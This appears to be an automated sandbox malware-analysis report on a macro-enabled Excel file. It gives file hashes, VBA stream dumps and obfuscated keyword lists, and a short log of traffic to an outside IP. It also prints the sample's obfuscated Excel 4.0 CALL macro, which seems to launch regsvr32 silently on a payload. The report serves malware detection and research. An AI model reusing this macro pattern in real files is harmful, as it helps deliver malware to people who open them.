Preview:	L..................F.... ...%..S....U..@....s..@...\|............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..+R=.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N..+R=.....#J....................a-j.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..+R=......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.....+RG. .SAMPLE~1.XLS..^......>Q{<+RG......V....................{...s.a.m.p.l.e.2.0.2.1.0.1.1.1.-.0.1...x.l.s.m.......\...............-.......[...........>.S......C:\Users\user\Desktop\sample20210111-01.xlsm..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.a.m.p.l.e.2.0.2.1.0.1.1.1.-.0.1...x.l.s.m.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	2.9808259362290785
Encrypted:	false
SSDEEP:	3:QAlX0Gn:QKn
MD5:	7962B839183642D3CDC2F9CEBDBF85CE
SHA1:	2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256:	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512:	2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious:	false
Preview:	....p.r.a.t.e.s.h.....

C:\Users\user\Desktop\CAF40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	52604
Entropy (8bit):	7.835266879450367
Encrypted:	false
SSDEEP:	1536:Hxz6aVXaPaG7zyjuD4eQYRbc/l47s19B1V+ZWCL1Syv:HxtVKiG7eju1QYR8OIN+ZWEAyv
MD5:	AA49971F883AA532921DC83132C7FD57
SHA1:	E28B73B82FA4A9B124822914EE0D8A42895EFA20
SHA-256:	D9ED557F4E4F34F64945F8D2EB3F90170D03585EDFF0554E3DA96440645AD8CB
SHA-512:	BD2FB878379E3A345BECC58739AEB98FD8922623ACA9CA94148B0EA7A42B4C412F5E9E2DC558349BA2E72C3B85D05A7B259D5097BF721745B02502A0A3E191FE
Malicious:	false
Preview:	..MO.0...+...\|]..{X.US...Y.....LZo.%...3NB.(...4M..}f&........iMA..d`.-......6.$Y..\Y..9B W.....G.!C......~3...4..:0.RY.y.[.c.......Z.b..&.1y......bv......4$...P...))x.@Ym.O..V..PZ....a.....K$...#&...d:...:...+@W..&O+...,K...Ee.~.K.~`.G.ie.v.zR7_s._{...N......x.5~B.(.b.ak.NG.h:...P...Ts...[...y+...}....^..0..3...R...2.'..8".=`..9.N.....C<.g.tI......,......f.\DY...g.S7.h/Z.....M>"&v_..........w.7.^4v.g...=.6.:wh.>J8....~"....&.t.P..Y{.m^.......PK..........!.........*.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$sample20210111-01.xlsm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtBhFXI6dtt:RJZhJ1
MD5:	836727206447D2C6B98C973E058460C9
SHA1:	D83351CF6DE78FEDE0142DE5434F9217C4F285D2
SHA-256:	D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
SHA-512:	7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
Malicious:	true
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.75941359400182
TrID:	Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50% Excel Microsoft Office Open XML Format document (40004/1) 37.92% ZIP compressed archive (8000/1) 7.58%
File name:	sample20210111-01.xlsm
File size:	40268
MD5:	fa5350d4304c4c2ceafa435244b5a5fc
SHA1:	fc8a20962b8cf86568b1e85be02ee9c7b62d94b2
SHA256:	0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d
SHA512:	09cf2c537c358aea59a242b2b25129cc780bcc571e0ef611e2b1eb40078c1ff27356d1a45b1dd42249685e97b18e12173be2dde0e54bf4913fcce4b3703ea625
SSDEEP:	768:1wTZYx6TBDUzVXaI4/ybclX7aV+uFdeq9AQxD2KL0gnp5zFVqJlZ:sa6aVXaPaG7zyvxDhLnzjqJlZ
File Content Preview:	PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd0e2f696908c

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	2

OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T13:42:02Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General
Stream Path:	VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	3215
Data ASCII:	. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Integer:
bycilke()
VB_Name
MiV(sem.value)
homepodd()
homepodd
Error
Integer)
bycilke
Function
ol).Name
"!"):
String
"ab":
Split(govs,
Randomize:
yellowsto(yel
Next:
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
yellowsto(Oa))))
Integer
yellowsto
ol).value
nimo(Int((UBound(nimo)
Replace(Vo,
Chr(sem.Row)
Sheets(ol).Cells(homepodd,
"ab"))
Split(kij(ol),
yellowsto(homepodd))
Rnd))
(Run(""
"moreP_"
Variant)
Attribute
Resume
pagesREviewsd(Optional
ecimovert(nimo
ecimovert
MsgBox

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 1614

General
Stream Path:	VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	1614
Data ASCII:	. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
Data Raw:	01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 e3 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Index
VB_Name
VB_Creatable
Application.OnTime
VB_Exposed
Long)
ResizePagess()
VB_Customizable
"REviewsd"
VB_Control
MultiPage"
VB_TemplateDerived
MSForms,
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
ResizePagess
"pages"

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General
Stream Path:	VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	999
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 554

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	554
Entropy:	5.25519546931
Base64 Encoded:	True
Data ASCII:	I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 7 3 5 C 4 1 F C C 6 1 0 7 6 5 0 7 6 5 0 7 6 5 0 7 6 5 " . . D P B = " 6 E 6 C 9 D 6 8 E 3 A 8 1 B A 9 1 B A 9 1
Data Raw:	49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d

Stream Path: PROJECTwm, File Type: data, Stream Size: 86

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	86
Entropy:	3.24455457963
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3574
Entropy:	4.46002460936
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2060
Entropy:	3.45134089702
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . E . . . . . . C . _ . . . : . . . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	187
Entropy:	1.91493173134
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	363
Entropy:	2.21122978445
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	398
Entropy:	2.07709195049
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 820

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	820
Entropy:	6.5044215585
Base64 Encoded:	True
Data ASCII:	. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 90 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T13:42:02Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 115

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	115
Entropy:	4.80096587863
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: f, File Type: data, Stream Size: 178

General
Stream Path:	f
File Type:	data
Stream Size:	178
Entropy:	2.59766210867
Base64 Encoded:	False
Data ASCII:	. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
Data Raw:	00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 b0 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i02/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/f, File Type: data, Stream Size: 40

General
Stream Path:	i02/f
File Type:	data
Stream Size:	40
Entropy:	1.54176014818
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/o, File Type: empty, Stream Size: 0

General
Stream Path:	i02/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i03/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/f, File Type: data, Stream Size: 40

General
Stream Path:	i03/f
File Type:	data
Stream Size:	40
Entropy:	1.90677964945
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/o, File Type: empty, Stream Size: 0

General
Stream Path:	i03/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: o, File Type: data, Stream Size: 152

General
Stream Path:	o
File Type:	data
Stream Size:	152
Entropy:	2.68720470607
Base64 Encoded:	False
Data ASCII:	. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
Data Raw:	00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80

Stream Path: x, File Type: data, Stream Size: 48

General
Stream Path:	x
File Type:	data
Stream Size:	48
Entropy:	1.42267983198
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 18:34:24.019299030 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:24.202037096 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:24.202444077 CET	49746	443	192.168.2.4	74.220.219.210
